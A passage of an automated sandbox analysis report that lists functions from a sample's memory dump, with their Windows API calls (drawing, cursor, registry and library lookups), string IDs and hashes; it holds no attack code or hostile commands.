                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-3990135632
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fd75f47f6a61e8298f8f1fa31e39ff05cb2880220caf04597cf4ff164dd40579
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1db31b6b51e2e068c3f61674d824012408e1fbc1d182cf764eafebb5ab4ea00f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd75f47f6a61e8298f8f1fa31e39ff05cb2880220caf04597cf4ff164dd40579
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF318970E00619EBDB01EFA5C88169EB7B8AF44315F50857BE814E7382D738AE09C799
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041C178
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(?), ref: 0041C184
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                                                                                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: E98830$A480A570BitsE922FocusObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2688936647-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32c019c2b17a625013bd7d07803e420f9d7b692fe3dc5f877fb11705181084ab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                                                                                                                                                                                                                                                                                                  • 6F9C2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004099C0: 6F9BC400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                                                                                                                                                                                                                                                                                                  • 6FA2CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                                                                                                                                                                                                                                                                                                  • 6FA2C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                                                                                                                                                                                                                                                                                                  • 6FA2CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                                                                                                                                                                                                                                                                                                  • 6F9C0860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MetricsSystem$C0860C2980C400C740
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 624341609-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004836EC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-2530820420
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dd565cb65b0d6aea09fbff18d8f368e1da5f885c1b12c06516510a7bbb930e6f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd565cb65b0d6aea09fbff18d8f368e1da5f885c1b12c06516510a7bbb930e6f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00494ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                                                                                                                                                                                                                                                                                                                                  • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                                                                                                                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1435929781-222967699
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f18d4fe6cef93123b0455e30b82395b7dbfc0c8f911bccc88a8e51c4d6277b1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7d6f97b91dc48adac3cf3527b9ba73e93ee7bba49e4f60ed72cccac08d23d6d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95018476A04609BFEB00DBA9CC41F5EB7ECDB89704F51447AB600E7281D678AE018B28
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ObjectSelect$Delete$Stretch
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1458357782-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCursorPos.USER32 ref: 004233BF
                                                                                                                                                                                                                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00423423
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1770779139-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00494CFC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-2254406584
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0cb39cd026c5cfa5de683a7a06027fca95da1476d0954c2123b34056c2a6665f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cb39cd026c5cfa5de683a7a06027fca95da1476d0954c2123b34056c2a6665f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045D4EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ISCryptGetVersion), ref: 0045D4F5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ArcFourInit), ref: 0045D505
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ArcFourCrypt), ref: 0045D515
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-508647305
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cbbf728949466433ef1b5e6beef4c759beeb6f0ef4629b40a2ffa63b94b95771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbbf728949466433ef1b5e6beef4c759beeb6f0ef4629b40a2ffa63b94b95771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045D9EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DA05
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
